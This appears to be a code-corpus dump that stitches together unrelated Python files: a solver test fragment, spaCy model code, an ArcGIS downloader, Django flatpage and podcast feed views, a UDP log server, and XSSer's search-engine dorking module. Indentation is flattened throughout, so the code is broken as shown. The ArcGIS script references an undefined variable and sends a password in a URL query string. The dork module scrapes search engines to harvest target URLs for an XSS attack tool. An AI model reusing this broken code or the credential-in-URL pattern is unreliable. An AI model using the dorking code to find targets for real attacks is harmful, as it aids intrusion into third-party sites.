comm.reduce(np.linalg.norm(uy-u_[1])),
comm.reduce(np.linalg.norm(pe-p_))]
if comm.Get_rank() == 0:
print('Error u v p')
print(' %2.4e %2.4e %2.4e' %(error[0], error[1], error[2]))
#assert np.all(abs(np.array(error)) < 1e-7), error
if 'pytest' not in os.environ:
import matplotlib.pyplot as plt
plt.figure()
X = TD.local_mesh(True)
plt.contourf(X[0], X[1], p_, 100)
plt.figure()
plt.contourf(X[0], X[1], pe, 100)
plt.figure()
plt.quiver(X[0], X[1], u_[0], u_[1])
plt.figure()
plt.quiver(X[0], X[1], ux, uy)
plt.figure()
plt.spy(M.diags())
plt.figure()
plt.contourf(X[0], X[1], u_[0], 100)
#plt.show()
| bsd-2-clause | -389,010,432,669,954,800 | 29.308271 | 117 | 0.592905 | false | 2.486737 | false | false | false |
spacy-io/spaCy | spacy/ml/tb_framework.py | 1 | 1420 | from thinc.api import Model, noop
from .parser_model import ParserStepModel
def TransitionModel(
tok2vec, lower, upper, resize_output, dropout=0.2, unseen_classes=set()
):
"""Set up a stepwise transition-based model"""
if upper is None:
has_upper = False
upper = noop()
else:
has_upper = True
# don't define nO for this object, because we can't dynamically change it
return Model(
name="parser_model",
forward=forward,
dims={"nI": tok2vec.get_dim("nI") if tok2vec.has_dim("nI") else None},
layers=[tok2vec, lower, upper],
refs={"tok2vec": tok2vec, "lower": lower, "upper": upper},
init=init,
attrs={
"has_upper": has_upper,
"unseen_classes": set(unseen_classes),
"resize_output": resize_output,
},
)
def forward(model, X, is_train):
step_model = ParserStepModel(
X,
model.layers,
unseen_classes=model.attrs["unseen_classes"],
train=is_train,
has_upper=model.attrs["has_upper"],
)
return step_model, step_model.finish_steps
def init(model, X=None, Y=None):
model.get_ref("tok2vec").initialize(X=X)
lower = model.get_ref("lower")
lower.initialize()
if model.attrs["has_upper"]:
statevecs = model.ops.alloc2f(2, lower.get_dim("nO"))
model.get_ref("upper").initialize(X=statevecs)
| mit | 8,833,489,119,848,649,000 | 28.583333 | 78 | 0.602817 | false | 3.454988 | false | false | false |
wakamori/GoForIt | 1/1-1.py | 1 | 1788 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
1-1.py
license BSD
author chen_ji <wakamori111 at gmail.com>
"""
import datetime
import random
import sys
class DayLife:
"""Life in a day."""
def __init__(self, date, life):
"""Set birth datetime and life."""
self.birthdate = date
self.life = life
finalyear = self.birthdate.year + self.life
finaldate = datetime.datetime(finalyear, self.birthdate.month,
self.birthdate.day)
self.finaldate = finaldate - datetime.timedelta(days=1)
def now(self):
"""Calculate current time."""
curdate = datetime.datetime.now()
maxdays = (self.finaldate - self.birthdate).days
curdays = (curdate - self.birthdate).days
curtime = datetime.timedelta(days=1) / maxdays
curtime = curtime * curdays
return datetime.time(
(curtime.seconds / 60) / 60,
(curtime.seconds / 60) % 60,
curtime.seconds % 60)
if __name__ == '__main__':
# options
startyear = 1990
endyear = 2000
life = 80
print startyear, "<= a <=", endyear
print "n =", life
daycount = (datetime.datetime(endyear, 12, 31) -
datetime.datetime(startyear, 1, 1)).days
birthdate = datetime.datetime(startyear, 1, 1) + \
datetime.timedelta(days=random.randint(0, daycount))
args = sys.argv
if len(args) == 4:
year = int(args[1])
month = int(args[2])
date = int(args[3])
birthdate = datetime.datetime(year, month, date)
print "birthdate:", birthdate.date()
mylife = DayLife(birthdate, life)
print "finaldate:", mylife.finaldate.date()
print "today:", mylife.now()
| bsd-2-clause | -1,893,952,449,638,936,800 | 29.827586 | 72 | 0.571588 | false | 3.64898 | false | false | false |
adambreznicky/javascript | Guardrail/Snake/downloadGET_v1.py | 1 | 3746 | __file__ = 'downloadGET_v1'
__date__ = '11/12/2015'
__author__ = 'ABREZNIC'
import arcpy, zipfile, os, shutil, urllib, urllib2, json, glob
# http://blogs.esri.com/esri/arcgis/2013/10/10/quick-tips-consuming-feature-services-with-geoprocessing/
district = arcpy.GetParameterAsText(0)
username = arcpy.GetParameterAsText(1)
password = arcpy.GetParameterAsText(2)
output = arcpy.GetParameterAsText(3).replace("\\", os.sep)
directory = arcpy.env.scratchFolder + os.sep + district + "_GET"
if not os.path.exists(directory):
os.makedirs(directory)
else:
shutil.rmtree(directory)
os.makedirs(directory)
arcpy.AddMessage("directory created.")
baseURL = "http://services.arcgis.com/KTcxiTD9dsQw4r7Z/arcgis/rest/services/GET_Maintenance_AGO/FeatureServer/0/query"
arcpy.AddMessage("url created.")
if district == "Statewide":
where = "1=1"
else:
where = ""
def getObjectIDs(query):
params = {'where': query, 'returnIdsOnly': 'true', 'token': token, 'f': 'json'}
req = urllib2.Request(baseURL, urllib.urlencode(params))
response = urllib2.urlopen(req)
data = json.load(response)
array = data["objectIds"]
array.sort()
arcpy.AddMessage("Object IDs Found")
return array
def createFC(fs):
arcpy.CreateFileGDB_management(directory, "TxDOT_GuardrailEndTreatments")
fgdb = directory + os.sep + "TxDOT_GuardrailEndTreatments"
arcpy.CopyFeatures_management(fs, fgdb + ".gdb" + os.sep + "GET_" + district + "Dist")
newFC = fgdb + ".gdb" + os.sep + "GET_" + district + "Dist"
arcpy.AddMessage("feature class created.")
return newFC
def updatedQuery(low, high, trigger):
if low != high:
addition = """ AND "OBJECTID" >= """ + str(low) + " AND " + """"OBJECTID" < """ + str(high)
if trigger == 1:
addition = """ AND "OBJECTID" >= """ + str(low)
else:
addition = """ AND "OBJECTID" = """ + str(low)
newQuery = where + addition
return newQuery
try:
arcpy.AddMessage('\nGenerating Token\n')
server = baseURL.split("//")[1].split("/")[0]
tokenURL = 'http://' + server + '/arcgis/tokens/?username=' + username + '&password=' + password + '&referer=http%3A%2F%2F' + server + '&f=json'
req = urllib2.Request(tokenURL)
response = urllib2.urlopen(req)
data = json.load(response)
token = data['token']
except:
token = ''
pass
fields ='*'
objectIDs = getObjectIDs(where)
total = len(objectIDs)
arcpy.AddMessage("Total: " + str(total))
totalFixed = total - 1
last = objectIDs[-1]
low = 0
high = 1000
theFC = ""
while low <= total:
arcpy.AddMessage(low)
min = objectIDs[low]
try:
max = objectIDs[high]
trigger = 0
except:
max = objectIDs[totalFixed]
trigger = 1
OIDquery = updatedQuery(min, max, trigger)
query = "?where={}&outFields={}&returnGeometry=true&f=json&token={}".format(OIDquery, fields, token)
fsURL = baseURL + query
fs = arcpy.FeatureSet()
fs.load(fsURL)
arcpy.AddMessage("select completed.")
if low == 0:
theFC = createFC(fs)
else:
arcpy.Append_management(fs, theFC, "NO_TEST")
low += 1000
high += 1000
arcpy.AddMessage("packing up...")
zipper = output
if os.path.isfile(zipper):
os.remove(zipper)
arcpy.AddMessage("zipfile started.")
if downloadFormat == "FGDB":
newZipper = zipper[:-4]
shutil.make_archive(newZipper, "zip", directory)
elif downloadFormat == "SHP":
zip = zipfile.ZipFile(zipper, 'w', zipfile.ZIP_DEFLATED)
for filename in os.listdir(directory):
if not filename.endswith('.lock'):
zip.write(os.path.join(directory, filename), filename)
zip.close()
arcpy.AddMessage("zipfile completed.")
arcpy.AddMessage("that's all folks!!") | mit | -4,923,730,972,539,032,000 | 30.754237 | 148 | 0.64976 | false | 3.201709 | false | false | false |
pculture/mirocommunity | localtv/admin/flatpages_views.py | 1 | 2483 | from django.contrib.flatpages.models import FlatPage
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.views.decorators.csrf import csrf_protect
from localtv.admin import forms
from localtv.decorators import require_site_admin
from localtv.models import SiteSettings
@require_site_admin
@csrf_protect
def index(request):
headers = [
{'label': 'Page Name'},
{'label': 'URL'}]
site_settings = SiteSettings.objects.get_current()
flatpages = FlatPage.objects.filter(sites=site_settings.site)
formset = forms.FlatPageFormSet(queryset=flatpages)
form = forms.FlatPageForm()
if request.method == 'GET':
return render_to_response('localtv/admin/flatpages.html',
{'formset': formset,
'form': form,
'headers': headers},
context_instance=RequestContext(request))
else:
if request.POST.get('submit') == 'Add':
form = forms.FlatPageForm(request.POST)
if form.is_valid():
flatpage = form.save()
flatpage.sites.add(site_settings.site)
return HttpResponseRedirect(request.path + '?successful')
return render_to_response('localtv/admin/flatpages.html',
{'formset': formset,
'form': form,
'headers': headers},
context_instance=RequestContext(request))
else:
formset = forms.FlatPageFormSet(request.POST,
queryset=flatpages)
if formset.is_valid():
formset.save()
action = request.POST.get('bulk_action')
if action == 'delete':
for data in formset.cleaned_data:
if data['BULK']:
data['id'].delete()
return HttpResponseRedirect(request.path + '?successful')
else:
return render_to_response(
'localtv/admin/flatpages.html',
{'formset': formset,
'form': form,
'headers': headers},
context_instance=RequestContext(request))
| agpl-3.0 | 6,873,660,476,525,704,000 | 40.383333 | 79 | 0.530407 | false | 5.162162 | false | false | false |
mpihlak/pg_logforward | testing/test_logserver.py | 1 | 1769 | #!/usr/bin/env python
import sys, SocketServer
class JSONLogServer(SocketServer.BaseRequestHandler):
"""
Sample UDP server for receiving JSON messages.
"""
def handle_json(self, data):
try:
import json
msg = json.loads(data)
print("parsed json message:")
for k in msg.keys():
print(" %s: %s" % (k, msg[k]))
print
except Exception, e:
print("json parsing error: %s" % e)
def handle_netstr(self, data):
try:
import netstring
decoder = netstring.Decoder()
keys = [ "username", "database", "remotehost", "debug_query_string", "elevel",
"funcname", "sqlerrcode", "message", "detail", "hint", "context ",
"instance_label", "timestamp" ]
pos = 0
for field in decoder.feed(data):
if pos < len(keys):
k = keys[pos]
print(" %s: %s" % (k, field))
pos += 1
except Exception, e:
print("netstr parsing error: %s" % e)
def handle_syslog(self, data):
pass
def handle(self):
data = self.request[0].strip()
print("raw message: %s" % data)
if not data:
return
if data.startswith("{"):
self.handle_json(data)
elif data[0].isdigit():
self.handle_netstr(data)
elif data[0] == '<':
self.handle_syslog(data)
if __name__ == "__main__":
if len(sys.argv) < 2:
PORT = 23456
else:
PORT = int(sys.argv[1])
HOST = ""
print("Listening on %s:%s" % (HOST, PORT))
server = SocketServer.UDPServer((HOST, PORT), JSONLogServer)
server.serve_forever()
| bsd-2-clause | 1,712,845,533,709,028,900 | 26.640625 | 90 | 0.504805 | false | 3.887912 | false | false | false |
AlmostBetterNetwork/pinecast | podcasts/views.py | 1 | 18321 | import datetime
import time
from email.utils import formatdate, parsedate
from xml.sax.saxutils import escape, quoteattr
from django.conf import settings
from django.http import Http404, HttpResponse, HttpResponseNotAllowed, HttpResponseNotModified, StreamingHttpResponse
from django.shortcuts import redirect
from django.views.decorators.cache import cache_control, never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.gzip import gzip_page
from django.views.decorators.http import require_POST
import accounts.payment_plans as plans
import analytics.log as analytics_log
from .models import Podcast, PodcastEpisode, PodcastSlugMigration
from accounts.models import UserSettings
from analytics.analyze import get_request_ip
from payments.models import RecurringTip
from pinecast.helpers import get_object_or_404, json_response, render, reverse
from pinecast.signatures import signer
DEFAULT_EPISODE_PREFIX = 'S{season}E{episode} - '
VALID_SOURCES = ['direct', 'rss', 'jsonfeed', 'embed']
@never_cache
def listen(req, episode_id):
ep = get_object_or_404(PodcastEpisode, id=episode_id)
source = req.GET.get('source', 'direct')
if source in VALID_SOURCES:
listen = analytics_log.get_listen_obj(
ep=ep,
source=source,
req=req,
ip=get_request_ip(req),
ua=req.META.get('HTTP_USER_AGENT', 'Unknown'),
timestamp=datetime.datetime.now(),
)
analytics_log.commit_listens([listen])
return redirect(ep.get_raw_url())
def feed(req, podcast_slug):
pod, redirect = _get_pod_or_redirect(podcast_slug)
if redirect:
return redirect
episodes = pod.get_episodes(select_related=('audio', 'artwork', 'episodefeedbackprompt'))
# Write the log of this to the analytics back-end(s)
analytics_log.write_subscription(req, pod, is_private=False)
caching_response = _handle_caching(req, pod, episodes)
if caching_response:
return caching_response
return _gen_feed(req, pod, episodes)
def feed_private(req, podcast_slug, subscriber):
try:
sm = PodcastSlugMigration.objects.select_related('podcast').get(migrate_from=podcast_slug)
return redirect(reverse('feed_private', podcast_slug=sm.podcast.slug, subscriber=subscriber))
except PodcastSlugMigration.DoesNotExist:
pass
pod = get_object_or_404(Podcast, slug=podcast_slug)
recurring_tip = get_object_or_404(RecurringTip, podcast=pod, tipper__uuid=subscriber, deactivated=False)
setattr(recurring_tip, 'podcast', pod) # ✨magic optimization ✨
if not recurring_tip.eligible_to_access_private():
raise Http404()
episodes = pod.get_episodes(include_private=True)
# Write the log of this to the analytics back-end(s)
analytics_log.write_subscription(req, pod, is_private=True)
caching_response = _handle_caching(req, pod, episodes)
if caching_response:
return caching_response
return _gen_feed(req, pod, episodes, is_private=True)
if settings.FEED_GZIP:
feed = gzip_page(feed)
feed_private = gzip_page(feed_private)
def _get_pod_or_redirect(slug):
try:
sm = PodcastSlugMigration.objects.select_related('podcast').get(migrate_from=slug)
return None, redirect(reverse('feed', podcast_slug=sm.podcast.slug))
except PodcastSlugMigration.DoesNotExist:
pass
return get_object_or_404(Podcast.objects.select_related('cover_art', 'owner', 'site'), slug=slug), None
def _handle_caching(req, pod, episodes):
if req.method not in ('GET', 'HEAD'):
return HttpResponseNotAllowed(permitted_methods=['GET', 'HEAD'])
last_update = max(pod.last_feed_update, pod.last_feed_update, *[e.publish for e in episodes])
last_update = last_update - datetime.timedelta(microseconds=last_update.microsecond)
expected_etag = last_update.isoformat()
match_etag = req.META.get('HTTP_IF_NONE_MATCH')
if match_etag:
if match_etag.strip('"') == expected_etag:
return HttpResponseNotModified()
elif settings.DEBUG:
print('Expected "{}" to match "{}"'.format(match_etag, expected_etag))
now = datetime.datetime.now()
ims = req.META.get('HTTP_IF_MODIFIED_SINCE')
if ims:
try:
ims_parsed = datetime.datetime(*parsedate(ims)[:6])
if ims_parsed >= last_update:
return HttpResponseNotModified()
elif settings.DEBUG:
print(ims_parsed, last_update)
except Exception as e:
if settings.DEBUG:
print(e)
return None
def _gen_feed(req, pod, episodes, is_private=False):
start_time = datetime.datetime.now()
items = []
is_demo = UserSettings.get_from_user(pod.owner).plan == plans.PLAN_DEMO
channel_explicit_tag = '<itunes:explicit>%s</itunes:explicit>' % ('yes' if pod.is_explicit else 'no')
if not isinstance(episodes, list):
episodes = list(episodes)
pod_is_serial = pod.episode_release_type == 'serial'
# `1, 1,` because if there are no episodes, you'll get an `int object is not iterable` error
newest_season = max(1, 1, *[x.season for x in episodes if x.season])
episodes_by_season = {}
for ep in episodes:
if not ep.season:
continue
season_set = episodes_by_season.setdefault(ep.season, set())
if not ep.season_episode:
continue
season_set.add(ep.season_episode)
episodes_by_season.setdefault(newest_season, set()) # For empty podcasts
episodes_without_nums_by_season = {
season: sum(1 for e in episodes if (e.season == season or not e.season) and not e.season_episode) for
season in episodes_by_season
}
episode_prefix = pod.serial_ep_prefix_format or DEFAULT_EPISODE_PREFIX
# TODO: Make the database do this with `values()`?
categories = sorted([c.category for c in pod.podcastcategory_set.all()], key=lambda c: len(c))
category_map = {}
for cat in categories:
spl = cat.split('/')
cursor = category_map
for i in spl:
cursor.setdefault(i, {})
cursor = cursor[i]
def render_cat(c):
for k, v in c.items():
if not v:
yield '<itunes:category text=%s />' % quoteattr(k)
else:
yield (
'<itunes:category text={cat}>{inner}</itunes:category>'
.format(cat=quoteattr(k), inner='\n'.join(render_cat(v)))
)
def generate_item(ep):
ep_url = ep.get_url('rss')
md_desc = ep.get_html_description(is_demo=is_demo)
title = ep.title
if pod_is_serial and ep.episode_type == 'full' and ep.season and ep.season_episode:
title = episode_prefix.format(season=ep.season, episode=ep.season_episode)[:256] + title
season = ep.season if ep.season else newest_season
if ep.season_episode:
season_episode = str(ep.season_episode)
elif ep.episode_type != 'full':
season_episode = 1
else:
season_episode = episodes_without_nums_by_season[season] + len(episodes_by_season[season])
while season_episode in episodes_by_season[season]:
season_episode -= 1
episodes_by_season[season].add(season_episode)
episodes_without_nums_by_season[season] -= 1
season = str(season)
season_episode = str(season_episode)
yield (
'<item>'
'<title>{title}</title>'
'<description><![CDATA[{desc}]]></description>'
'<link>{url}</link>'
'<guid isPermaLink="false">{guid}</guid>'
'<pubDate>{publish}</pubDate>'
'<itunes:author>{author}</itunes:author>'
'<itunes:subtitle>{subtitle}</itunes:subtitle>'
'<itunes:image href={artwork} />'
'<itunes:duration>{duration}</itunes:duration>'.format(
title=escape(title),
desc=md_desc,
url=escape(ep.get_site_url() or ep_url),
guid=escape(ep.get_guid()),
publish=formatdate(time.mktime(ep.publish.timetuple())),
author=escape(pod.author_name),
subtitle=escape(ep.subtitle),
artwork=quoteattr(ep.get_image_url()),
duration=escape(ep.formatted_duration()),
)
)
if title != ep.title:
yield '<itunes:title>%s</itunes:title>' % escape(ep.title)
if ep.explicit_override != PodcastEpisode.EXPLICIT_OVERRIDE_CHOICE_NONE:
yield '<itunes:explicit>%s</itunes:explicit>' % (
'yes' if ep.explicit_override == PodcastEpisode.EXPLICIT_OVERRIDE_CHOICE_EXPLICIT else 'clean')
else:
yield channel_explicit_tag
if ep.audio:
yield '<enclosure url=%s length=%s type=%s />' % (
quoteattr(ep_url),
quoteattr(str(ep.audio.content_size)),
quoteattr(ep.audio.content_type)
)
if ep.episode_type != 'full':
yield '<itunes:episodeType>%s</itunes:episodeType>' % escape(ep.episode_type)
if pod_is_serial:
yield '<itunes:season>%s</itunes:season>' % escape(season)
if pod_is_serial and ep.episode_type == 'full':
yield '<itunes:episode>%s</itunes:episode>' % escape(season_episode)
if ep.copyright:
yield '<dc:copyright>%s</dc:copyright>' % escape(ep.copyright)
if ep.license:
yield '<dc:rights>%s</dc:rights>' % escape(ep.license)
yield '</item>'
def generate_content():
yield (
'<?xml version="1.0" encoding="UTF-8"?>\n'
'<?xml-stylesheet type="text/xsl" media="screen" href="/static/rss.xsl"?>\n'
'<rss xmlns:atom="http://www.w3.org/2005/Atom"\n'
' xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"\n'
' xmlns:dc="http://purl.org/dc/elements/1.1/"\n'
' xmlns:pinecast="https://pinecast.com/rss-dtd/1.0/"\n'
' version="2.0">\n'
'<channel>\n'
'<title>{title}</title>\n'
'<link>{homepage}</link>\n'
'<atom:link href="{canonical}" rel="self" type="application/rss+xml" />\n'
'<generator>Pinecast (https://pinecast.com)</generator>\n'
'{pinecast_site}'
'<language>{language}</language>'.format(
title=escape(pod.name),
homepage=escape(pod.homepage),
canonical=escape(pod.canonical_feed_url()),
language=escape(pod.language),
pinecast_site=(
'<pinecast:site>{}</pinecast:site>\n'.format(pod.get_site().get_domain()) if
pod.get_site() else
''
),
)
)
if pod.copyright:
yield '<copyright>%s</copyright>' % escape(pod.copyright)
if pod.episode_release_type != 'episodic':
yield '<itunes:type>%s</itunes:type>' % escape(pod.episode_release_type)
if pod.rss_redirect:
yield '<itunes:new-feed-url>%s</itunes:new-feed-url>' % escape(pod.canonical_feed_url())
if pod.subtitle:
yield '<itunes:subtitle>%s</itunes:subtitle>' % escape(pod.subtitle)
yield (
'<itunes:author>{author}</itunes:author>\n'
'<description><![CDATA[{description}]]></description>\n'
'<itunes:owner>\n'
'<itunes:name>{author_name}</itunes:name>\n'
'<itunes:email>{owner_email}</itunes:email>\n'
'</itunes:owner>\n'
'{channel_explicit_tag}\n'
'<itunes:image href={cover_art_attr} />\n'
''.format(
author=escape(pod.author_name),
description=pod.description,
author_name=escape(pod.author_name),
owner_email=escape(pod.owner.email),
channel_explicit_tag=channel_explicit_tag,
cover_art_attr=quoteattr(pod.get_cover_image_url()),
cover_art=escape(pod.get_cover_image_url()),
title=escape(pod.name),
homepage=escape(pod.homepage),
)
)
yield '\n'.join(render_cat(category_map))
for ep in episodes:
if settings.FEED_STREAMING:
yield '\n'.join(generate_item(ep))
else:
yield from generate_item(ep)
yield '</channel>\n</rss>'
if UserSettings.get_from_user(pod.owner).plan == plans.PLAN_DEMO:
if len(episodes) > 10:
yield '<!-- This feed is truncated because the owner is not a paid customer. -->'
else:
yield '<!-- This feed will be truncated at 10 items because the owner is not a paid customer. -->'
end_time = datetime.datetime.now()
delta = end_time - start_time
yield '<!-- generated in {}s {}us -->'.format(delta.seconds, delta.microseconds)
if settings.DEBUG_TOOLBAR:
yield '</body>'
if pod.rss_redirect:
resp = HttpResponse(status=301)
resp.setdefault('Location', pod.rss_redirect)
return resp
user_agent = req.META.get('HTTP_USER_AGENT', '')
if settings.DEBUG_TOOLBAR:
content_type = 'text/html'
else:
content_type = 'text/xml' if user_agent.startswith('Mozilla') else 'application/rss+xml'
content_type_with_encoding = content_type + '; charset=utf-8'
if settings.FEED_STREAMING:
resp = StreamingHttpResponse(
(c + '\n' for c in generate_content()),
content_type=content_type_with_encoding,
status=200,
)
else:
resp = HttpResponse(
'\n'.join(generate_content()),
content_type=content_type_with_encoding,
status=200,
)
# Get the estimated last update timestamp
last_update = max(pod.last_feed_update, pod.last_feed_update, *[e.publish for e in episodes])
# Shave off the microsecond component
last_update = last_update - datetime.timedelta(microseconds=last_update.microsecond)
resp.setdefault('ETag', 'W/"{}"'.format(last_update.isoformat()))
resp.setdefault('Last-Modified', formatdate(time.mktime(last_update.timetuple())))
resp.setdefault('Access-Control-Allow-Origin', '*')
resp.setdefault('Access-Control-Request-Method', 'GET')
return resp
@gzip_page
@json_response(cors=True)
def json_feed(req, podcast_slug):
pod, redirect = _get_pod_or_redirect(podcast_slug)
if redirect:
return redirect
is_demo = UserSettings.get_from_user(pod.owner).plan == plans.PLAN_DEMO
pod_is_serial = pod.episode_release_type == 'serial'
episode_prefix = pod.serial_ep_prefix_format or DEFAULT_EPISODE_PREFIX
episodes = pod.get_episodes()
out = {
'version': 'https://jsonfeed.org/version/1',
'title': pod.name,
'description': pod.description,
'icon': pod.get_cover_image_url(),
'author': {'name': pod.author_name},
'feed_url': pod.canonical_feed_url(),
'items': [
{
'id': str(ep.id),
'url': ep.get_site_url() or ep.get_url('jsonfeed'),
'title': (
episode_prefix.format(season=ep.season, episode=ep.season_episode) + ep.title if
pod_is_serial and ep.episode_type == 'full' and ep.season and ep.season_episode else
ep.title
),
'content_html': ep.get_html_description(is_demo=is_demo),
'image': ep.get_image_url(),
'date_published': ep.publish.strftime('%Y-%m-%dT%H:%M:%SZ'),
'attachments': [
{
'url': ep.get_url('jsonfeed'),
'mime_type': ep.audio.content_type,
'size_in_bytes': ep.audio.content_size,
'duration_in_seconds': ep.duration,
},
],
} for
ep in
episodes
]
}
if pod.homepage:
out['home_page_url'] = pod.homepage
return out
PLAYER_THEMES = set(['minimal', 'thick', 'slim'])
@gzip_page
@cache_control(public=True, max_age=3600)
def player(req, episode_id):
ep = get_object_or_404(PodcastEpisode.objects.select_related('audio', 'artwork'), id=episode_id)
pod = get_object_or_404(Podcast.objects.select_related('owner'), id=ep.podcast_id)
setattr(ep, 'podcast', pod)
if ep.check_is_private() and (not req.user or req.user.id != pod.owner):
raise Http404()
theme = 'minimal'
if req.GET.get('theme') in PLAYER_THEMES:
theme = req.GET.get('theme')
ctx = {'episode': ep}
if req.GET.get('card'):
ctx['card'] = True
resp = render(req, 'player/%s.html' % theme, ctx)
# If the user is not a demo user, allow the player to be used outside the app.
if UserSettings.user_meets_plan(ep.podcast.owner, plans.FEATURE_MIN_PLAYER):
resp.xframe_options_exempt = True
return resp
@gzip_page
@cache_control(public=True, max_age=3600)
def player_latest(req, podcast_slug):
pod = get_object_or_404(Podcast, slug__iexact=podcast_slug)
eps = pod.get_episodes()
if not eps:
raise Http404()
url = reverse('player', episode_id=str(eps[0].id))
theme = req.GET.get('theme', 'minimal')
return redirect(url + '?theme={}'.format(theme))
@csrf_exempt
@require_POST
def update_duration(req):
try:
ep_id = signer.unsign(req.POST.get('ep_id', ''), max_age=3600).decode('utf-8')
except Exception as e:
return HttpResponse(status=400)
ep = get_object_or_404(PodcastEpisode, id=ep_id)
try:
ep.duration = int(float(req.POST.get('duration', '0')))
except Exception as e:
return HttpResponse(status=400)
ep.save()
return HttpResponse(status=204)
| apache-2.0 | -478,698,706,499,665,860 | 37.562105 | 117 | 0.595349 | false | 3.669271 | false | false | false |
xujun10110/golismero | tools/xsser/XSSer/dork.py | 7 | 13363 | #!/usr/bin/python
# -*- coding: iso-8859-15 -*-
"""
$Id$
This file is part of the xsser project, http://xsser.sourceforge.net.
Copyright (c) 2011/2012 psy <[email protected]> - <[email protected]>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 3 of the License.
xsser is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import urlparse
import urllib2
import traceback
urllib2.socket.setdefaulttimeout(5.0)
from BeautifulSoup import BeautifulSoup
DEBUG = 1
class Dorker(object):
def __init__(self, engine='bing'):
self._engine = engine
def dork(self, search):
"""
Perform a search and return links.
Uses -bing- engine by default.
(http://en.wikipedia.org/wiki/List_of_search_engines)
"""
urlpar = None
divid = None
unpack_func = None
css_class = None
raw_extract = None
html_tok = 'a'
paging_arg = None # allow to do paging
if self._engine == 'bing' or not self._engine: # works at 20-02-2011
search_url = "http://www.bing.com/search?q=" + urllib2.quote(search)
divid = 'results_container'
elif self._engine == 'scroogle':
search_url = "http://www.scroogle.org/cgi-bin/nbbw.cgi?q=" + urllib2.quote(search)
elif self._engine == 'altavista': # works at 20-02-2011
def altavista_func(href):
href = href['href']
# http://search.yahoo.com/r/_ylt=A0oG7p45zGBNl0MAuhQPxQt.;_ylu=X3oDMTByMTNuNTZzBHNlYwNzcgRwb3MDMgRjb2xvA2FjMgR2dGlkAw--/SIG=11942um5m/EXP=1298275769/**http%3a//money.cnn.com/
if "**" in href:
return {'href':urlparse.unquote(href[href.rfind('**')+2:])}
#divid = 'results' -> in other altavista=?
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if "<a class='res'" in line and "http" in line:
href = line[line.find("http"):line.rfind("'")]
results.append({'href': href})
return results
css_class = 'res'
#unpack_func = altavista_func -> in otherS?
#search_url = "http://us.yhs4.search.yahoo.com/yhs/search?fr=altavista&itag=ody&q=" + urllib2.quote(search)
search_url = "http://es.altavista.com/web/results?fr=altavista&itag=ody&q=" + urllib2.quote(search)
elif self._engine == 'duck': # seems hopeless at 20-02-2011
search_url = "https://duckduckgo.com/?q=" + urllib2.quote(search)
elif self._engine == 'baidu': # works at 20-02-2011
#html_tok = 'span'
#css_class = 'g'
def raw_extract(html_data, encoding):
results = []
pos = 0
while pos < len(html_data):
pos = html_data.find('span class="g">', pos)
if pos == -1:
break;
href = html_data[pos+15:html_data.find('<', pos)].strip()
pos = pos + 1
if not href:
continue
href = href.split(" ")[0]
if not href.startswith('http'):
href = 'http://'+href
results.append({'href': href})
return results
search_url = "http://www.baidu.com/s?wd=" + urllib2.quote(search)
elif self._engine == 'yandex': # works at 20-02-2011
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if 'class="b-serp-url__link"' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
return results
#css_class = 'b-serp-url__link'
search_url = "http://yandex.ru/yandsearch?text=" + urllib2.quote(search)
elif self._engine == 'yebol':
divid = "Scrollbar-SearchResultsc"
search_url = "http://www.yebol.com/a.jsp?x=0&y=0&key=" + urllib2.quote(search)
elif self._engine == 'youdao':
search_url = "http://www.youdao.com/search?q=" + urllib2.quote(search)
#elif self._engine == 'ask': # not works
# def raw_extract(html_data, encoding):
# results = []
# prevline = ""
# for line in html_data.split("\n"):
# if 'class="title txt_lg"' in line and "http" in prevline:
# href = prevline[prevline.find("http"):prevline.find('"',
# prevline.find("http")+10)]
# results.append({'href': href})
# prevline = line
# return results
# search_url = "http://www.ask.com/web?q=" + urllib2.quote(search)
elif self._engine == 'google': # works at 11/11/2011
#def raw_extract(html_data, encoding):
# results = []
# prevline = ""
# for line in html_data.split("\n"):
# if 'class="r"' in line and "http" in prevline:
# href = prevline[prevline.find("http"):prevline.find('"',
# prevline.find("http")+10)]
# results.append({'href': href})
# prevline = line
# return results
search_url = "https://encrypted.google.com/search?hl=en&q=" + urllib2.quote(search)
elif self._engine == 'yahoo': # works at 20-02-2011
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if 'class="yschttl spt"' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
return results
search_url = "http://search.yahoo.com/search?p=" + urllib2.quote(search)
elif self._engine == 'sogou':
search_url = "http://www.sogou.com/web?query=" + urllib2.quote(search)
elif self._engine == 'rediff':
search_url = "http://search1.rediff.com/dirsrch/default.asp?src=web&MT=" + urllib2.quote(search)
elif self._engine == 'blekko':
search_url = "http://blekko.com/ws/?q=" + urllib2.quote(search)
elif self._engine == 'kosmix': # doesnt work properly
def raw_extract(html_data, encoding):
print html_data
results = []
is_next = False
for line in html_data.split("\n"):
#if 'class="www_result_url"' in line and "http" in line:
if '<h4>' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
is_next=False
if is_next and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
is_next=False
elif '<h4>' in line:
is_next=True
else:
is_next=False
return results
search_url = "http://www.kosmix.com/topic/lala?q=" + urllib2.quote(search)
elif self._engine == 'search': # works at 20-02-2011
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if 'class="www_result_url"' in line and "http" in line:
#if 'class="www_result_title"' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
return results
search_url = "http://www.search.ch/?q=" + urllib2.quote(search)
elif self._engine == 'ifacnet':
search_url = "http://www.ifacnet.com/?q=" + urllib2.quote(search)
elif self._engine == 'bussines':
